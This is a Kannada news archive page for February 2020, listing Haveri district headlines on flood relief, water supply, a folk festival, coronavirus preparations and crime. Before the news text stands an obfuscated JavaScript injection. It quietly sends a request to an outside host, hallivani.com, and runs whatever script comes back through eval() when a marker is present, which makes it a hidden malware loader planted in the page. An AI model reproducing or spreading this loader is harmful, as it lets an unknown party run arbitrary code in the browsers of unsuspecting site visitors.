;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: February 2020

ಪರಿಹಾರ ವಿತರಣೆ ಲೋಪ ತನಿಖೆ: ತಪ್ಪಿತಸ್ಥರಿಗೆ ಕಾನೂನು ಚೌಕಟ್ಟಿನಲ್ಲಿ ಶಿಕ್ಷೆ : ಅಪರ ಜಿಲ್ಲಾಧಿಕಾರಿ ಯೋಗೇಶ್ವರ

ಹಾವೇರಿ: ಅತಿವೃಷ್ಟಿ ಹಾಗೂ ನೆರೆಯಿಂದ ಹಾನಿಯಾದವರಿಗೆ ಬೆಳೆ ಹಾಗೂ ಮನೆ ಪರಿಹಾರ ವಿತರಣೆಯಲ್ಲಿ ಲೋಪ ಎಸಗಿದ ಅಧಿಕಾರಿಗಳ ಗುರುತಿಸಿ ಶಿಸ್ತುಕ್ರಮ…

ಶುದ್ಧ ನೀರಿನ ಘಟಕಗಳ ಸ್ಥಗಿತ, ನೀರಿನ ಸಮಸ್ಯೆಗಳ ದೂರು ಸ್ವೀಕಾರಕ್ಕೆ ಸಹಾಯವಾಣಿ: ಜಿ.ಪಂ.ಅಧ್ಯಕ್ಷ ಬಸವನಗೌಡ ದೇಸಾಯಿ

ಹಾವೇರಿ: ಬೇಸಿಗೆಯ ಕುಡಿಯುವ ನೀರಿನ ಸಮಸ್ಯೆ ಹಾಗೂ ಶುದ್ಧ ನೀರಿನ ಘಟಕಗಳ ದುರಸ್ತಿ ಕುರಿತಂತೆ ಸಾರ್ವಜನಿಕರಿಂದ ದೂರು ಸ್ವೀಕರಿಸಿ ತಕ್ಷಣವೇ…

ಎ.26 ರಂದು ಕದರಮಂಡಲಗಿ ದೇವಾಲಯದಲ್ಲಿ ಸಪ್ತಪದಿ ಸಾಮೂಹಿಕ ವಿವಾಹ ಕಾರ್ಯಕ್ರಮ; ಮುಜರಾಯಿ ಸಚಿವ ಕೋಟ ಶ್ರೀನಿವಾಸ ಪೂಜಾರಿ

ಹಾವೇರಿ: ಮುಜರಾಯಿ ಇಲಾಖೆಯಿಂದ ಇದೇ ಎಪ್ರಿಲ್ 26 ರಂದು ಹಾವೇರಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ಹಮ್ಮಿಕೊಂಡಿರುವ ಸಪ್ತಪದಿ ಸಾಮೂಹಿಕ ವಿವಾಹ ಕಾರ್ಯಕ್ರಮವನ್ನು ಅತ್ಯಂತ…

ಜಿಪಿಎಸ್ ಮಾಡಿಸಲು ಫಲಾನುಭವಿಗಳಿಗೆ ಮಾರ್ಚ್ 15ರವರೆಗೆ ಗಡುವು: ಜಿಲ್ಲಾ ಪಂಚಾಯತ್ ಸಿಇಓ ರಮೇಶ ದೇಸಾಯಿ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಬಸವ ವಸತಿ ಹಾಗೂ ಡಾ.ಬಿ.ಆರ್.ಅಂಬೇಡ್ಕರ ವಸತಿ ಯೋಜನೆಯಡಿ ಬ್ಲಾಕ್ಡ್ ಮನೆಗಳನ್ನು ವಿಶೇಷ ಮನವಿಯ ಮೇರೆಗೆ ತೆರವುಗೊಳಿಸಲಾಗಿದೆ. ಇದೇ…

ಒಂದುವರೆ ತಿಂಗಳಲ್ಲಿ ಎಲ್ಲ ದೇವಾಲಯಗಳಿಗೆ ಆಡಳಿತಾಧಿಕಾರಿಗಳ ನೇಮಕ: ಸಚಿವ ಕೋಟ ಶ್ರೀನಿವಾಸ ಪೂಜಾರಿ

ಹಾವೇರಿ: ಹಿಂದು ದೇವಾಲಯಗಳ ರಕ್ಷಣೆ ಹಾಗೂ ವ್ಯವಸ್ಥಿತ ನಿರ್ವಹಣೆಗಾಗಿ ಮುಂದಿನ ಒಂದೂವರೆ ತಿಂಗಳೊಳಗಾಗಿ ರಾಜ್ಯದ ಎಲ್ಲ ದೇವಾಲಯಗಳಿಗೂ ವಿವಿಧ ಹಂತದ…

ಮಕ್ಕಳ ಭಾವನೆಗೆ ಸ್ಪಂದಿಸಿ ಉತ್ತಮ ಶಿಕ್ಷಣ ಕೊಡಿಸಿ ಪಾಲಕರಿಗೆ ನ್ಯಾಯಾಧೀಶರ ಸಲಹೆ

ಹಾವೇರಿ: ಮಕ್ಕಳ ಭಾವನೆಗಳಿಗೆ ಸ್ಪಂದಿಸಿ ಬಾಲ್ಯದಲ್ಲಿರುವಾಗಲೇ ಮಕ್ಕಳಿಗೆ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣವನ್ನು ಒದಗಿಸಿ ಸಮಾಜದಲ್ಲಿ ಉತ್ತಮ ಪ್ರಜೆಯಾಗಿ ಬೆಳೆಸಿ ಎಂದು ಒಂದನೇ…

ಜನಗಣತಿಯ ಯಶಸ್ವಿಗೆ ಸನ್ನದ್ಧರಾಗಲು ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಕರೆ

ಹಾವೇರಿ: ದೇಶದ ಅಭಿವೃದ್ಧಿ ಯೋಜನೆಗಳನ್ನು ರೂಪಿಸಲು ಅತ್ಯಂತ ಮಹತ್ವವಾದ ಜನಗಣತಿ ಕಾರ್ಯಕ್ಕೆ ನಿಯೋಜನೆಗೊಂಡ ಚಾರ್ಜ್ ಅಧಿಕಾರಿಗಳು ಸಮರ್ಥವಾಗಿ ತರಬೇತಿಯನ್ನು ಪಡೆದು…

ರಾಜ್ಯದ ಅಭಿವೃದ್ಧಿಗೆ ಸಂಪನ್ಮೂಲಗಳ ಕೊರತೆಯಾಗದಂತೆ ಎಚ್ಚರ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ

ಹಾವೇರಿ: ರಾಜ್ಯದ ಅಭಿವೃದ್ಧಿಗೆ ಸಂಪನ್ಮೂಲಗಳ ಕೊರತೆ ಆಗದಂತೆ ಎಚ್ಚರವಹಿಸಿ ಬಜೆಟ್‍ನಲ್ಲಿ ಎಲ್ಲ ಕ್ಷೇತ್ರಗಳ ಸಮಾನ ಅಭಿವೃದ್ಧಿಗೆ ಆದ್ಯತೆ ನೀಡಲಾಗುವುದು ಎಂದು…

ಪದವಿ ಜೊತೆಗೆ ಕೌಶಲ್ಯ ಹೊಂದಿ: ಉದ್ಯೋಗಾಕಾಂಕ್ಷಿಗಳಿಗೆ ಗೃಹ ಸಚಿವರ ಕರೆ

ಹಾವೇರಿ: ಇಂದಿನ ಜಾಗತೀಕ ಸಂದರ್ಭದಲ್ಲಿ ಕೇವಲ ಒಂದು ಪದವಿ, ಒಂದು ಕೋರ್ಸ್ ಮುಗಿಸಿದರೆ ಸಾಲುವುದಿಲ್ಲ. ಕಾಲಮಾನದ ಅಪೇಕ್ಷೆಗೆ ತಕ್ಕಂತೆ ವೃತ್ತಿಕೌಶಲ್ಯ…

ಶಿವರಾತ್ರಿಗೆ ಸಡಗರದ ಸಿದ್ಧತೆ: ವಿಶೇಷ ಪೂಜೆ, ರಾತ್ರಿಯಿಡೀ ಜಾಗರಣೆ

ಸವಣೂರು: ನಗರದ ಬುಧವಾರ ಪೇಟೆಯಲ್ಲಿ ಈಶ್ವರ ದೇವಸ್ಥಾನ ಜೀರ್ಣೋದ್ಧಾರ ಸಮಿತಿ ವತಿಯಿಂದ ಮಹಾ ಶಿವರಾತ್ರಿ ಆಚರಣೆ ಹಾಗೂ ಅಹೋರಾತ್ರಿ ಸಾಂಸ್ಕೃತಿಕ…

ಮುಕ್ತ ಮನಸ್ಸು ಹೊಂದಿದರೆ ಮಾತ್ರ ವಿಶ್ವ ಸಮಾನತೆ ಕಾಣಬಹುದು: ನ್ಯಾಯಾಧೀಶೆ ಎಸ್.ಎಚ್.ರೇಣುಕಾದೇವಿ

ಹಾವೇರಿ: ಮಾನವ ಜಾತಿ, ಧರ್ಮ, ಸಮುದಾಯಕ್ಕೆ ಸಿಮಿತರಾಗಿರದೆ ಮುಕ್ತ ಮನಸ್ಸಿಗರಾಗಿ ಬೆಳೆದಾಗ ಮಾತ್ರ ವಿಶ್ವದ ಸಮಾನತೆ ಕಾಣಲು ಸಾಧ್ಯ ಎಂದು…

‘ಪಾಕಿಸ್ತಾನ ಜಿಂದಾಬಾದ್’ ಘೋಷಣೆ ಕೂಗಿದ ಅಮೂಲ್ಯ ವಿರುದ್ಧ ಪ್ರಕರಣ ದಾಖಲು

ಬೆಂಗಳೂರು: ಪೌರತ್ವ (ತಿದ್ದುಪಡಿ) ಕಾಯ್ದೆ ವಿರೋಧಿಸಿ ಟಿಪ್ಪು ಸುಲ್ತಾನ್‌ ಯುನೈಟೆಡ್‌ ಫ್ರಂಟ್‌ ನಗರದ ಸ್ವಾತಂತ್ರ್ಯ ಉದ್ಯಾನದಲ್ಲಿ ಗುರುವಾರ ಸಂಜೆ ಆಯೋಜಿಸಿದ್ದ…

ಕವಿ ಬಿಸರಳ್ಳಿ ಮೇಲಿನ ಪ್ರಕರಣ ವಾಪಸ್ ಪಡೆಯಲು ಪ್ರಗತಿಪರ ಸಂಘಟನೆಗಳ ಒಕ್ಕೂಟ ಆಗ್ರಹ

ಹಾವೇರಿ: ಕೊಪ್ಪಳ ಜಿಲ್ಲೆಯ ಪತ್ರಕರ್ತ ಹಾಗೂ ಕವಿ ಸಿರಾಜ್ ಬಿಸರಳ್ಳಿ ಅವರನ್ನು ತಕ್ಷಣ ಬಿಡುಗಡೆ ಮಾಡುವುದರೊಂದಿಗೆ ಅವರ ಮೇಲಿನ ಪ್ರಕರಣವನ್ನು…

ಸಾರಿಗೆ ಸಂಸ್ಥೆಗೆ ಇಲೆಕ್ಟ್ರಿಕಲ್ ಬಸ್ ಖರೀದಿಗೆ ಸಿದ್ಧ: ಉಪಮುಖ್ಯಮಂತ್ರಿ ಲಕ್ಷ್ಮಣ ಸವದಿ

ಹುಬ್ಬಳ್ಳಿ: ಇಲೆಕ್ಟ್ರಿಕಲ್ ಬಸ್ ಗಳನ್ನು ಪೂರೈಸಲು ಯಾವುದಾದರೂ ಉದ್ಯಮಗಳು ಮುಂದೆ ಬಂದರೆ ರಾಜ್ಯದ ಸಾರಿಗೆ ಸಂಸ್ಥೆಗೆ ಖರೀದಿಸಲು ಒಡಂಬಡಿಕೆ ಮಾಡಿಕೊಳ್ಳಲು…

ರೈತರ ಕಣ್ಣಿರು ಒರಿಸುವ ಪ್ರಾಮಾಣಿಕ ಪ್ರಯತ್ನ ಮಾಡುತ್ತೇನೆ: ಕೃಷಿ ಸಚಿವ ಬಿಸಿ ಪಾಟೀಲ್

ಹಾವೇರಿ: ರಾಜ್ಯದ ಉದ್ದಗಲಕ್ಕೂ ಸಂಚರಿಸುವುದರೊಂದಿಗೆ ಒಬ್ಬ ರೈತನ ಮಗನಾಗಿ, ಕೃಷಿ ಸಚಿವನಾಗಿ ರೈತರ ಕಷ್ಟ ನಷ್ಟಗಳಿಗೆ ಸ್ಪಂದಿಸುವುದರೊಂದಿಗೆ ಅವರ ಕಣ್ಣಿರನ್ನು…

ಜಾನಪದಕ್ಕೆ ಸಾವಿಲ್ಲ: ಗೃಹ ಸಚಿವ ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಹಾವೇರಿ: ಮನುಷ್ಯರ ಭಾವನೆಯ ಜೊತೆಗೆ ಬೆರೆತು ಹೋಗಿರುವ ಜಾನಪದಕ್ಕೆ ಸಾವಿಲ್ಲ, ನಾಗರೀಕತೆ ಆರಂಭದಲ್ಲಿ ಹುಟ್ಟಿದ ಇದು ಮನುಕುಲ ಅಂತ್ಯದವರೆಗೂ ಇರುತ್ತದೆ. ಜಾನಪದ…

ರಾಜ್ಯ ಮಟ್ಟದ ಜಾನಪದ ಜಾತ್ರೆ: ಕಲಾ ಜಾಥಾ ಉದ್ಘಾಟಿಸಿ ಜೊಡೆತ್ತಿನ ಬಂಡಿ ಓಡಿಸಿದ ಶಾಸಕ ನೆಹರು ಓಲೇಕಾರ

ಹಾವೇರಿ: ರಾಜ್ಯ ಮಟ್ಟದ ಜಾನಪದ ಜಾತ್ರೆ ಅಂಗವಾಗಿ ನಗರದಲ್ಲಿಂದು ಬೃಹತ್ ಕಲಾಜಾಥಾ ನಡೆಯಿತು. ಮುರುಘಾಮಠದ ಆವರಣದಲ್ಲಿ ಕಲಾಜಾಥಾಕ್ಕೆ ಚಾಲನೆ ನೀಡಿದ…

ಜಾನಪದ ಜಾತ್ರೆ: ವಸ್ತುಪ್ರದರ್ಶನ ಮಳಿಗೆಗೆ ಶಾಸಕರಿಂದ ಚಾಲನೆ

ಹಾವೇರಿ: ಜಿಲ್ಲಾಡಳಿತ, ಜಿಲ್ಲಾ ಪಂಚಾಯತ್ ಹಾಗೂ ಕನ್ನಡ ಮತ್ತು ಸಂಸ್ಕೃತಿ ಇಲಾಖೆ ಸಹಯೋಗದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಜಾನಪದ ಜಾತ್ರೆ ಅಂಗವಾಗಿ ನಗರದ…

ಫೆ. 16ಕ್ಕೆ ಗಣಮೇಳ, ಸರ್ವಶರಣರ ಸಮ್ಮೇಳನ: ಬಸವಶಾಂತಲಿಂಗ ಶ್ರೀ

ಹಾವೇರಿ: ಜಾಗತಿಕ ಶಾಂತಿ, ಪ್ರಗತಿಗಾಗಿ ಜಗದ್ಗುರು ಮುರುಘರಾಜೇಂದ್ರ ಬೃಹನ್ಮಠ ಚಿತ್ರದುರ್ಗ, ಬಸವ ಕೇಂದ್ರಗಳು, ಬಸವ ಸಂಘಟನೆಗಳು, ವಿವಿಧ ಧಾರ್ಮಿಕ ಕೇಂದ್ರಗಳು…

ನೆರೆಹಾನಿ ಮನೆಗಳ ಪುನರ್ ನಿರ್ಮಾಣ ಗಂಭೀರವಾಗಿ ಪರಗಣಿಸಿ: ಮನೋಜ್‍ಕುಮಾರ್ ಮೀನಾ

ಹಾವೇರಿ: ನೆರೆಯಿಂದ ಹಾನಿಗೊಳಗಾದ ಎಲ್ಲ ಮನೆಗಳ ಪುನರ್ ನಿರ್ಮಾಣ ಕಾರ್ಯ ಒಂದು ವಾರದೊಳಗಾಗಿ ಆರಂಭವಾಗಲೇಬೇಕು. ಈ ವಿಚಾರವನ್ನು ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸಿ…

ಕರೋನಾ ವೈರಸ್- ಮುನ್ನೆಚ್ಚರಿಕೆ ಕ್ರಮವಾಗಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ಪ್ರತ್ಯೇಕ ವಾರ್ಡ್: ಡಾ.ನಾಗರಾಜ ನಾಯಕ್

ಹಾವೇರಿ: ಕರೊನಾ ವೈರಸ್‍ ಗುಣ ಲಕ್ಷಣಗಳು ಕಂಡುಬಂದಂತಹ ರೋಗಿಗಳ ಚಿಕಿತ್ಸೆ ಹಾಗೂ ಮುನ್ನೆಚ್ಚರಿಕೆಗಾಗಿ ಜಿಲ್ಲೆಯಲ್ಲಿ ವಿಶೇಷ ಚಿಕಿತ್ಸಾ ಘಟಕ ಸ್ಥಾಪಿಸಲಾಗಿದೆ…

ವಿದ್ಯಾರ್ಥಿಗಳ ಭವಿಷ್ಯ ನಿರ್ಮಿಸುವಲ್ಲಿ ತಾಯಂದಿರ ಪಾತ್ರ ಮಹತ್ವದ್ದು: ಈರಣ್ಣ ಲಮಾಣಿ

ಹಾವೇರಿ: ತೊಟ್ಟಿಲನ್ನು ತೂಗುವ ಕೈ ಜಗತ್ತನೆ ತೂಗಬಲ್ಲದು ಎನ್ನುವ ನಾನ್ನುಡಿಯಂತೆ ವಿದ್ಯಾರ್ಥಿಗಳ ಭವಿಷ್ಯ ನಿರ್ಮಿಸುವಲ್ಲಿ ತಾಯಂದಿರ ಪಾತ್ರ ಮಹತ್ವದ್ದಾಗಿದ್ದು,ಈ ದಿಶೆಯಲ್ಲಿ…

ಹಾವೇರಿಯಲ್ಲಿ ಮಹಿಳೆಯರ ಕತ್ತಿಗೆ ಕೈ ಹಾಕಿ ಸರಗಳ್ಳತನ: ಆತಂಕದಲ್ಲಿ ಜನರು

ಹಾವೇರಿ: ನಗರದಲ್ಲಿ ಸರ ಕಳ್ಳತನ ಮತ್ತೆ ಸದ್ದು ಮಾಡಿದ್ದು, ಸೋಮುವಾರ ಸಂಜೆ ವಾಯುವಿಹಾರಕ್ಕೆ ಹೋಗಿ ಬರುವ ಸಂದರ್ಭದಲ್ಲಿ ಬೈಕ್‌ನಲ್ಲಿ ಬಂದ…